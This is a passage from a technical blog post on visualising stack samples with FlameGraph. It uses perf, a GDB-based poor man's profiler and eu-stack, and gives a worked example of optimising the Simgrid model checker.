QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#8  0x00007f4d97162ab9 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQtCore.so.4\n#9  0x00000000004082d6 in ?? ()\n#10 0x00007f4d966d2b45 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6\n#11 0x0000000000409181 in _start ()\n[...]\n
\n\n\n

By doing this a few times, you should be able to get an idea of\nwhat's taking time in your process (or thread).

\n

Using FlameGraph for visualising stack samples

\n

Taking a few random stack samples of the process might be fine and\nhelp you in some cases, but in order to have more accurate information\nyou will want to take a lot of stack samples. FlameGraph can help you\nvisualise those stack samples.

\n

How does FlameGraph work?

\n

FlameGraph reads stack samples from its standard input in a simple\nformat where each line represents one stack (a semicolon-separated\ncall chain) and its number of samples:

\n
main;init;init_boson_processor;malloc  2\nmain;init;init_logging;malloc          4\nmain;processing;compute_value          8\nmain;cleanup;free                      3\n
\n\n\n

FlameGraph generates a corresponding SVG representation:

\n
\n\n \"[corresponding\n\n
Corresponding FlameGraph output
\n
\n\n
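To generate a similar graph from the snippet above (assuming flamegraph.pl from the FlameGraph repository is in the PATH):
\n
cat > samples.folded <<'EOF'\nmain;init;init_boson_processor;malloc 2\nmain;init;init_logging;malloc 4\nmain;processing;compute_value 8\nmain;cleanup;free 3\nEOF\nflamegraph.pl samples.folded > example.svg\n
\n\n\n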

FlameGraph ships with a set of preprocessing scripts\n(stackcollapse-*.pl) used to convert data from various\nperformance/profiling tools into this simple format,\nwhich means you can use FlameGraph with perf, DTrace,\nSystemTap or your own tool:

\n
your_tool | flamegraph_preprocessor_for_your_tool | flamegraph > result.svg\n
\n\n\n

It is very easy to add support for a new tool in a few lines of\nscript. I wrote a\npreprocessor\nfor the GDB backtrace output (produced by the poor man's\nprofiler script shown below) which is now available\nin the main repository.

\n

As FlameGraph uses a tool-neutral line-oriented format, it is very\neasy to add generic filters after the preprocessor (using sed,\ngrep\u2026):

\n
the_tool | flamegraph_preprocessor_for_the_tool | filters | flamegraph > result.svg\n
\n\n\n

Update 2015-08-22:\nElfutils ships a stack program\n(called eu-stack on Debian) which seems to be much faster than GDB\nwhen used as a poor man's profiler in a shell script. I wrote a\nscript in order to feed its output to\nFlameGraph.
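As a rough sketch of the idea (PID being the process to sample; the linked script is more complete), eu-stack can simply be called in a loop:
\n
# Take 100 stack snapshots of process $PID with elfutils' eu-stack,\n# 0.05s apart, for later processing:\nfor i in $(seq 1 100); do\n  eu-stack -p \"$PID\"\n  sleep 0.05\ndone > samples.eu-stack\n
\n\n\n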

\n

Using FlameGraph with perf

\n

perf is a very powerful tool for Linux to do performance analysis of\nprograms. For example, here's how we can generate an\non-CPU\nFlameGraph of an application using perf:

\n
# Use perf to do a time based sampling of an application (on-CPU):\nperf record -F99 --call-graph dwarf myapp\n\n# Turn the data into a cute SVG:\nperf script | stackcollapse-perf.pl | flamegraph.pl > myapp.svg\n
\n\n\n

This samples the on-CPU time, excluding time when the process is not\nscheduled (idle, waiting on a semaphore\u2026), which may not be what you\nwant. It is possible to sample\noff-CPU\ntime as well with\nperf.

\n

The simple and fast solution1 is to use the frame pointer\nto unwind the stack frames (--call-graph fp). However, the frame pointer\ntends to be omitted these days (it is not mandated by the x86_64 ABI):\nthis might not work very well unless you recompile the code and its dependencies\nwithout omitting the frame pointer (-fno-omit-frame-pointer).
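For example (a minimal sketch, assuming you can rebuild a hypothetical myapp and its hot dependencies):
\n
# Keep the frame pointer so that the cheap unwinding method works:\ngcc -O2 -fno-omit-frame-pointer -o myapp myapp.c\nperf record -F99 --call-graph fp ./myapp\nperf script | stackcollapse-perf.pl | flamegraph.pl > myapp-fp.svg\n
\n\n\n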

\n

Another solution is to use CFI to unwind the stack (with --call-graph\ndwarf): this uses either the DWARF CFI (.debug_frame section) or\nruntime stack unwinding (.eh_frame section). The CFI must be present\nin the application and shared objects (with\n-fasynchronous-unwind-tables or -g). On x86_64, .eh_frame should\nbe enabled by default.
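A minimal sketch of the corresponding build flags (same hypothetical myapp as above):
\n
# Make sure unwind tables (and debug info) are available for DWARF-based unwinding:\ngcc -O2 -g -fasynchronous-unwind-tables -o myapp myapp.c\nperf record -F99 --call-graph dwarf ./myapp\n
\n\n\n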

\n

Update 2015-09-19: Another solution on recent Intel chips (and\nrecent kernels) is to use the hardware LBR\nregisters (with --call-graph\nlbr).

\n

Transforming and filtering the data

\n

As FlameGraph uses a simple line-oriented format, it is very easy to\nfilter/transform the data by placing a filter between the\nstackcollapse preprocessor and FlameGraph:

\n
# I'm only interested in what's happening in MAIN():\nperf script | stackcollapse-perf.pl | grep MAIN | flamegraph.pl > MAIN.svg\n\n# I'm not interested in what's happening in init():\nperf script | stackcollapse-perf.pl | grep -v init | flamegraph.pl > noinit.svg\n\n# Let's pretend that realloc() is the same thing as malloc():\nperf script | stackcollapse-perf.pl | sed 's/realloc/malloc/' | flamegraph.pl > alloc.svg\n
\n\n\n

If you have recursive calls you might want to merge them in order to\nhave a more readable view. This is implemented in my\nbranch\nby stackfilter-recursive.pl:

\n
# I want to merge recursive calls:\nperf script | stackcollapse-perf.pl | stackfilter-recursive.pl | grep MAIN | flamegraph.pl\n
\n\n\n

Update 2015-10-16: this has been merged upstream.

\n

Using FlameGraph with the poor man's profiler (based on GDB)

\n

Sometimes you might not be able to get relevant information with\nperf. This might be because you do not have debugging symbols for\nsome libraries you are using: you will end up with missing\ninformation in the stacktrace. In this case, you might want to use GDB\ninstead, using the poor man's profiler\nmethod, because it tends to be better at unwinding the stack without\nframe pointers and debugging information:

\n
# Sample an already running process:\npmp 500 0.1 $(pidof mycommand) > mycommand.gdb\n\n# Or:\nmycommand my_arguments &\npmp 500 0.1 $! > mycommand.gdb\n\n# Generate the SVG:\ncat mycommand.gdb | stackcollapse-gdb.pl | flamegraph.pl > mycommand.svg\n
\n\n\n

Where pmp is a poor man's profiler script such as:

\n
#!/bin/bash\n# pmp - \"Poor man's profiler\" - Inspired by http://poormansprofiler.org/\n# See also: http://dom.as/tag/gdb/\n\nnsamples=$1\nsleeptime=$2\npid=$3\n\n# Sample stack traces:\nfor x in $(seq 1 $nsamples); do\n  gdb -ex \"set pagination 0\" -ex \"thread apply all bt\" -batch -p $pid 2> /dev/null\n  sleep $sleeptime\ndone\n
\n\n\n

Using this technique will slow the application a lot.

\n

Compared to the example with perf, this approach samples both on-CPU\nand off-CPU time.

\n

A real world example of optimisation with FlameGraph

\n

Here are some figures obtained when I was optimising the\nSimgrid\nmodel checker\non a given application,\nusing the poor man's profiler to sample the stack.

\n

Here is the original profile before optimisation:

\n
\n\n \n\n
FlameGraph before optimisation
\n
\n\n

Avoid looking up data in a hash table

\n

Nearly 65% of the time is spent in get_type_description(). In fact, the\nmodel checker spends its time looking up type descriptions in some hash tables\nover and over again.

\n

Let's fix this and store a pointer to the type description instead of\na type identifier in order to avoid looking up those types over\nand over again:

\n
\n\n \"[profile\n\n
FlameGraph after avoiding the type lookups
\n
\n\n

Cache the memory areas addresses

\n

After this modification,\n32% of the time is spent in libunwind's get_proc_name() (looking up\nfunction names from values of the instruction pointer) and\n12% is spent reading and parsing the output of cat\n/proc/self/maps over and over again. Let's fix the second issue first\nbecause it is simple: we cache the memory mapping of the process in\norder to avoid parsing /proc/self/maps all the time.

\n
\n\n \"[profile\n\n
FlameGraph after caching the /proc/self/maps output
\n
\n\n

Speed up function resolution

\n

Now, let's fix the other issue by resolving the functions\nourselves. It turns out we already have the address range of each function\nin memory (parsed from the DWARF information). All we have to do is use a\nbinary search in order to get a nice O(log n) lookup.

\n
\n\n \"[profile\n\n
FlameGraph after optimising the function lookups
\n
\n\n

Avoid looking up data in a hash table (again)

\n

Still, 10% of the time is spent looking up type descriptions from type\nidentifiers in hash tables. Let's store a reference to the type\ndescription instead and avoid this:

\n
\n\n \"profile\n\n
FlameGraph after avoiding some remaining type lookups
\n
\n\n

Result

\n

The non-optimised version took 2 minutes to complete. With\nthose optimisations, it takes only 6 seconds \"\ud83d\ude2e\". There is\nstill room for optimisation here, as 30% of the time is now spent in\nmalloc()/free() managing heap information.

\n

Remaining stuff

\n

Sampling other events

\n

Perf can sample many other kinds of events (hardware performance\ncounters, software performance counters, tracepoints\u2026). You can get\nthe list of available events with perf list. If you run it as\nroot you will see a lot more events (all the kernel tracepoints).
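For example (a quick sketch):
\n
# Events visible to the current user:\nperf list\n# As root, the kernel tracepoints are listed as well, e.g. the scheduler ones:\nsudo perf list 'sched:*'\n
\n\n\n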

\n

Here are some interesting events:

\n\n

More information about some perf events can be found in\nperf_event_open(2).

\n

You can then sample an event with:

\n
perf record --call-graph dwarf -e cache-misses myapp\n
\n\n\n
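The rest of the pipeline is unchanged:
\n
perf script | stackcollapse-perf.pl | flamegraph.pl > cache-misses.svg\n
\n\n\n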
\n\n \"[FlameGraphe\n\n
FlameGraph of cache misses
\n
\n\n

Ideas

\n\n

Extra tips

\n\n

References

\n\n
\n
\n
    \n
  1. \n

    When using frame pointer unwinding, the kernel unwinds the stack\nitself and only gives the instruction pointer of each frame to\nperf record. This behaviour is triggered by the\nPERF_SAMPLE_CALLCHAIN sample type.

    \n

When using DWARF unwinding, the kernel takes a snapshot of (a\npart of) the stack and gives it to perf record: perf record\nstores it in a file and the DWARF unwinding is done afterwards by\nthe perf tools. This uses\nPERF_SAMPLE_STACK_USER. PERF_SAMPLE_CALLCHAIN is used as well\nbut for the kernel-side stack (exclude_callchain_user).\u00a0\u21a9

    \n
  2. \n
\n
"}]}